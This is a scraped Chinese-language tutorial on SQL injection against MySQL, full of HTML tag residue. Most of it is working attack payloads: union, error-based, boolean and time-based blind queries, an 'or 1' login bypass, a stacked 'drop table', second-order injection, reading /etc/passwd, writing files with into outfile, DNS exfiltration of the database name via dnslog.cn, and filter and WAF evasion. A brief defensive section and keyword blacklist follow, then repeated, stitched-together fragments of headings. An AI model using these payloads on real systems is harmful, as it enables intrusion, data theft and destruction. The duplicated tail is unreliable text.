SQL注入攻击全面指南<\/h1>

1. SQL注入概述<\/h2>
SQL注入是一种将恶意SQL代码插入到应用的输入参数中，从而欺骗服务器执行恶意SQL命令的攻击技术。攻击者可以利用这种漏洞绕过安全措施，获取数据库中的敏感信息，甚至完全控制数据库服务器。<\/p>

2. SQL注入分类<\/h2>

2.1 根据回显情况分类<\/h3>

有回显注入<\/h4>

联合查询注入(Union-based)<\/strong>: 通过UNION操作符将恶意查询结果与正常查询结果合并显示<\/li>

报错注入(Error-based)<\/strong>: 利用数据库错误信息获取数据<\/li> <\/ul>
无回显注入<\/h4>

布尔盲注(Boolean-based Blind)<\/strong>: 通过页面返回的真假状态推断信息<\/li>
延时盲注(Time-based Blind)<\/strong>: 通过页面响应时间差异推断信息<\/li> <\/ul>
3. 基础信息获取技术<\/h2>
-- 查看当前用户 <\/span><\/span><\/span><\/span>select<\/span> user<\/span>(); <\/span><\/span> <\/span><\/span>-- 查看当前数据库 <\/span><\/span><\/span><\/span>select<\/span> database<\/span>(); <\/span><\/span> <\/span><\/span>-- 查看数据库版本 <\/span><\/span><\/span><\/span>select<\/span> version<\/span>(); <\/span><\/span><\/code><\/pre>4. 信息模式(Information_schema)利用<\/h2> MySQL 5.0+提供了information_schema数据库，包含数据库元数据：<\/p> -- 获取所有数据库名 <\/span><\/span><\/span><\/span>select<\/span> schema_name<\/span> from<\/span> information_schema.schemata; <\/span><\/span> <\/span><\/span>-- 获取当前数据库所有表名 <\/span><\/span><\/span><\/span>select<\/span> table_name<\/span> from<\/span> information_schema.tables where<\/span> table_schema=<\/span>database<\/span>(); <\/span><\/span> <\/span><\/span>-- 获取指定表的所有列名 <\/span><\/span><\/span><\/span>select<\/span> column_name<\/span> from<\/span> information_schema.columns where<\/span> table_name<\/span>=<\/span>'表名'<\/span> and<\/span> table_schema=<\/span>'数据库名'<\/span>; <\/span><\/span><\/code><\/pre>5. 报错注入技术<\/h2> 5.1 extractvalue函数<\/h3> select<\/span> extractvalue('<a><\/a>'<\/span>,concat('>'<\/span>,database<\/span>())); <\/span><\/span> <\/span><\/span>-- 获取表名 <\/span><\/span><\/span><\/span>select<\/span> extractvalue('>'<\/span>,concat('>'<\/span>,(select<\/span> group_concat(table_name<\/span>) from<\/span> information_schema.tables where<\/span> table_schema=<\/span>'geek'<\/span>))); <\/span><\/span> <\/span><\/span>-- 获取列名 <\/span><\/span><\/span><\/span>select<\/span> extractvalue('>'<\/span>,concat('>'<\/span>,(select<\/span> group_concat(column_name<\/span>) from<\/span> information_schema.columns where<\/span> table_name<\/span>=<\/span>'l0ve1ysq1'<\/span>))); <\/span><\/span><\/code><\/pre>5.2 updatexml函数<\/h3> select<\/span> updatexml(1<\/span>,concat('>'<\/span>,database<\/span>()),1<\/span>); <\/span><\/span> <\/span><\/span>-- 获取表数据 <\/span><\/span><\/span><\/span>select<\/span> updatexml('~'<\/span>,concat('>'<\/span>,(select<\/span> group_concat(table_name<\/span>) from<\/span> information_schema.tables where<\/span> table_schema=<\/span>database<\/span>()))); <\/span><\/span><\/code><\/pre>5.3 主键报错技术<\/h3> select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> and<\/span> ( <\/span><\/span> select<\/span> 123<\/span> from<\/span> ( <\/span><\/span> select<\/span> count<\/span>(*<\/span>),concat( <\/span><\/span> (select<\/span> group_concat(table_name<\/span>) from<\/span> information_schema.tables where<\/span> table_schema=<\/span>database<\/span>()), <\/span><\/span> '<'<\/span>,floor(rand(0<\/span>)*<\/span>2<\/span>) <\/span><\/span> ) as<\/span> fff from<\/span> users group<\/span> by<\/span> fff <\/span><\/span> )qwer <\/span><\/span>); <\/span><\/span><\/code><\/pre>6. 盲注技术<\/h2> 6.1 布尔盲注<\/h3> -- 判断数据库长度 <\/span><\/span><\/span><\/span>select<\/span> length<\/span>(database<\/span>())>=<\/span>数字<\/span>; <\/span><\/span> <\/span><\/span>-- 判断具体字符 <\/span><\/span><\/span><\/span>select<\/span> substring<\/span>(database<\/span>(),1<\/span>,1<\/span>)=<\/span>'c'<\/span>; <\/span><\/span>select<\/span> substr(database<\/span>(),1<\/span>,1<\/span>)=<\/span>'c'<\/span>; <\/span><\/span>select<\/span> mid(database<\/span>(),1<\/span>,1<\/span>)=<\/span>'c'<\/span>; <\/span><\/span>select<\/span> left<\/span>(database<\/span>(),2<\/span>)=<\/span>'ch'<\/span>; <\/span><\/span>select<\/span> right<\/span>(database<\/span>(),2<\/span>)=<\/span>'se'<\/span>; <\/span><\/span> <\/span><\/span>-- ASCII码判断 <\/span><\/span><\/span><\/span>select<\/span> ascii(substring<\/span>(database<\/span>(),1<\/span>,1<\/span>))><\/span>32<\/span>; <\/span><\/span><\/code><\/pre>6.2 延时盲注<\/h3> -- 基本延时 <\/span><\/span><\/span><\/span>select<\/span> if<\/span>(length<\/span>(database<\/span>())><\/span>1<\/span>,sleep(5<\/span>),123<\/span>); <\/span><\/span> <\/span><\/span>-- 其他延时方法 <\/span><\/span><\/span>-- 1. benchmark函数 <\/span><\/span><\/span><\/span>select<\/span> benchmark(1000000000<\/span>,database<\/span>()); <\/span><\/span> <\/span><\/span>-- 2. 笛卡尔积 <\/span><\/span><\/span><\/span>select<\/span> count<\/span>(*<\/span>) from<\/span> information_schema.columns A,information_schema.columns B,information_schema.columns C<\/span>; <\/span><\/span> <\/span><\/span>-- 3. GET_LOCK函数 <\/span><\/span><\/span><\/span>select<\/span> get_lock('abc'<\/span>,10<\/span>) from<\/span> chao.passwd; <\/span><\/span><\/code><\/pre>7. 特殊注入技术<\/h2> 7.1 万能密码<\/h3> select<\/span> *<\/span> from<\/span> passwd where<\/span> 用户名<\/span>=<\/span>'adw'<\/span> and<\/span> 密码<\/span>=<\/span>'awda'<\/span> or<\/span> 1<\/span> <\/span><\/span><\/code><\/pre>7.2 HEAD头注入<\/h3> 常见注入点：<\/p> Host<\/li> Referer<\/li> User-Agent<\/li> <\/ul> 相关PHP全局变量：<\/p> $_SERVER['HTTP_USER_AGENT'<\/span>] <\/span><\/span>$_SERVER['HTTP_HOST'<\/span>] <\/span><\/span>$_SERVER['HTTP_REFERER'<\/span>] <\/span><\/span>$_SERVER['HTTP_X_FORWARDED_FOR'<\/span>] <\/span><\/span>$_SERVER['REMOTE_ADDR'<\/span>] <\/span><\/span><\/code><\/pre>7.3 宽字节注入<\/h3> 适用于使用GBK编码的网站，利用GBK编码范围(%81到%FE)与转义字符结合形成汉字绕过过滤。<\/p> 7.4 堆叠注入<\/h3> 使用分号分隔执行多条SQL语句：<\/p> select<\/span> *<\/span> from<\/span> users; drop<\/span> table<\/span> users; <\/span><\/span><\/code><\/pre>7.5 编码注入<\/h3> 利用base64等编码方式绕过字符限制：<\/p> -- base64编码后的SQL语句 <\/span><\/span><\/span><\/span>dW5pb24gc2VsZWN0IDE=<\/span> <\/span><\/span><\/code><\/pre>7.6 二次注入<\/h3> 注册用户：zhangsan'#<\/code><\/li> 修改密码时执行：<\/li> <\/ol> UPDATE<\/span> users SET<\/span> PASSWORD=<\/span>'123456'<\/span> where<\/span> username=<\/span>'zhangsan'<\/span>#<\/span>'and password='<\/span>zhangsan' <\/span><\/span><\/span><\/code><\/pre>8. 文件操作技术<\/h2> 8.1 读取文件<\/h3> select<\/span> load_file('\/etc\/passwd'<\/span>); <\/span><\/span><\/code><\/pre>8.2 导出文件<\/h3> -- 查看导出权限配置 <\/span><\/span><\/span><\/span>show<\/span> variables like<\/span> "%secure_file_priv%"<\/span>; <\/span><\/span> <\/span><\/span>-- 导出数据到文件 <\/span><\/span><\/span><\/span>select<\/span> 1<\/span>,'123'<\/span> into<\/span> outfile "D:\\phpstudy_pro\\WWW\\1.txt"<\/span>; <\/span><\/span> <\/span><\/span>-- 非联合查询导出 <\/span><\/span><\/span><\/span>select<\/span> *<\/span> from<\/span> users where<\/span> id=<\/span>1<\/span> into<\/span> outfile "D:\\123456.txt"<\/span> lines terminated by<\/span> '123'<\/span>; <\/span><\/span><\/code><\/pre>8.3 DNS外带注入<\/h3> select<\/span> LOAD_file(concat("\/\/"<\/span>,database<\/span>(),".2qnqb7.dnslog.cn\/test"<\/span>)); <\/span><\/span><\/code><\/pre>9. 绕过技术<\/h2> 9.1 符号替换<\/h3> 空格替换：%20、%09、%0a、%0b、%0c、%0d、%a0<\/li> 注释符：\/**\/<\/code><\/li> 大小写混合：seLeCt DaTabAse()<\/code><\/li> 等价替换： and=&&=%26%26<\/li> or=||=%7c%7c<\/li> order by 3=into @1,@2,@3<\/li> union select=union all select<\/li> if(a,b,c)=case when(a) then b else c end<\/li> <\/ul> <\/li> <\/ul> 9.2 函数替换<\/h3> hex()、bin()=ascii()<\/li> group_concat()=concat_ws()<\/li> substr()=substring()、mid()、left、right<\/li> substr(database(),1,1)=substr(database() from 1 for 1)<\/li> <\/ul> 9.3 内联注释<\/h3> select<\/span> *<\/span> from<\/span> passwd \/*!where*\/<\/span> 用户<\/span>id=<\/span>1<\/span> <\/span><\/span><\/code><\/pre>10. 防护与修复<\/h2> 输入过滤<\/strong>：<\/p> 限制特殊字符：net user xp_cmdshell exec master.dbo.xp_cmdshell<\/code>等<\/li> 黑名单关键字：select and count Asc char mid insert delete from drop table update truncate<\/code>等<\/li> <\/ul> <\/li> 预处理\/预编译<\/strong>：<\/p> 使用参数化查询<\/li> PHP中使用PDO或mysqli预处理<\/li> <\/ul> <\/li> 最小权限原则<\/strong>：<\/p> 数据库账户仅授予必要权限<\/li> <\/ul> <\/li> 安全设备<\/strong>：<\/p> 部署WAF(Web应用防火墙)<\/li> 如雷池等专业防护设备<\/li> <\/ul> <\/li> 其他措施<\/strong>：<\/p> 关闭错误回显<\/li> 定期更新补丁<\/li> 安全编码规范培训<\/li> <\/ul> <\/li> <\/ol>

SQL注入攻击全面指南<\/h1>

1. SQL注入概述<\/h2> SQL注入是一种将恶意SQL代码插入到应用的输入参数中，从而欺骗服务器执行恶意SQL命令的攻击技术。攻击者可以利用这种漏洞绕过安全措施，获取数据库中的敏感信息，甚至完全控制数据库服务器。<\/p>

2. SQL注入分类<\/h2>

2.1 根据回显情况分类<\/h3>

5. 报错注入技术<\/h2>

6. 盲注技术<\/h2>

7. 特殊注入技术<\/h2>

7.3 宽字节注入<\/h3> 适用于使用GBK编码的网站，利用GBK编码范围(%81到%FE)与转义字符结合形成汉字绕过过滤。<\/p>

8. 文件操作技术<\/h2>

9. 绕过技术<\/h2>

1. SQL注入概述<\/h2>
SQL注入是一种将恶意SQL代码插入到应用的输入参数中，从而欺骗服务器执行恶意SQL命令的攻击技术。攻击者可以利用这种漏洞绕过安全措施，获取数据库中的敏感信息，甚至完全控制数据库服务器。<\/p>

7.3 宽字节注入<\/h3>
适用于使用GBK编码的网站，利用GBK编码范围(%81到%FE)与转义字符结合形成汉字绕过过滤。<\/p>